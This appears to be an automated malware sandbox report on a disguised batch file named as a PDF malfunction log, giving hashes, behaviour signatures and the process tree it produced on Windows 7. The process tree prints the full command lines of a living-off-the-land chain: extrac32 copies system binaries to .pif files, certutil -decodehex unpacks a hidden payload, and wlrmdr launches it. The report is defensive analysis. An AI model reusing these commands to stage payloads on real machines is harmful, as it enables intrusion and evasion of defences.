Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/01/2025, 06:25

General

  • Target

    MF-HF malfunction LOG Report,PDF.cmd

  • Size

    2.7MB

  • MD5

    52c4a6ab8615c5f10087756a5506a81d

  • SHA1

    4edc7261d4b1f624d94099071e5752fbc5864fae

  • SHA256

    b7aa6671b0d47e966e51c97c069edff139d312e7707ffbc22fb2392b3004021a

  • SHA512

    b542b3b361dac98ac1db9517aeac1bfec3dab4f3439729f466a225550e1c0b486bf662989bc15f51d25842fedca09087105bd81a48a13a9632f0167375ce39ef

  • SSDEEP

    24576:ybei0ej3l3KRE+5WyHCN51BPTjF0Sj2dkucbo0063u9wN6UFfbDXRCDy:ybeiJjERE+q51SdvmYUz

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
      2⤵
        PID:2324
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
        2⤵
          PID:2284
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
          2⤵
            PID:3048
          • C:\Users\Public\alpha.pif
            C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1580
            • C:\Users\Public\phf.pif
              C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
              3⤵
              • Executes dropped EXE
              PID:536
          • C:\Users\Public\alpha.pif
            C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2736
            • C:\Users\Public\phf.pif
              C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
              3⤵
              • Executes dropped EXE
              PID:2876
          • C:\Users\Public\awpha.pif
            "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
            2⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2612
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 5
            2⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2628

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Public\AnyDesk.avi

          Filesize

          1.9MB

          MD5

          1681b40bf17bbaa119bc15de0178a7f0

          SHA1

          4aa764f20cfbcad18a2fd2d6233e80ad6ad8a341

          SHA256

          d61ec9e10804abaf84e4c59f3a9369f27fd25ba6e60ed293dfc82581b2553cda

          SHA512

          6b73ce5d844bfbc9caffc55c3412ed0b87e046c3833b000b14fed7e8b2fa3a6fe951b6d63a5080de65f5d69ad60b8a4d254542ad83233f2bb4ed1471fb6e49f6

        • C:\Users\Public\awpha.pif

          Filesize

          43KB

          MD5

          1b79536d9033da4ee3b8b21354dbd391

          SHA1

          09b4a38f0a6960768f26ef86a30bc0167e690f50

          SHA256

          385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95

          SHA512

          2475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae

        • C:\Users\Public\phf.pif

          Filesize

          1.1MB

          MD5

          ec1fd3050dbc40ec7e87ab99c7ca0b03

          SHA1

          ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

          SHA256

          1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

          SHA512

          4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

        • \Users\Public\alpha.pif

          Filesize

          337KB

          MD5

          5746bd7e255dd6a8afa06f7c42c1ba41

          SHA1

          0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

          SHA256

          db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

          SHA512

          3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e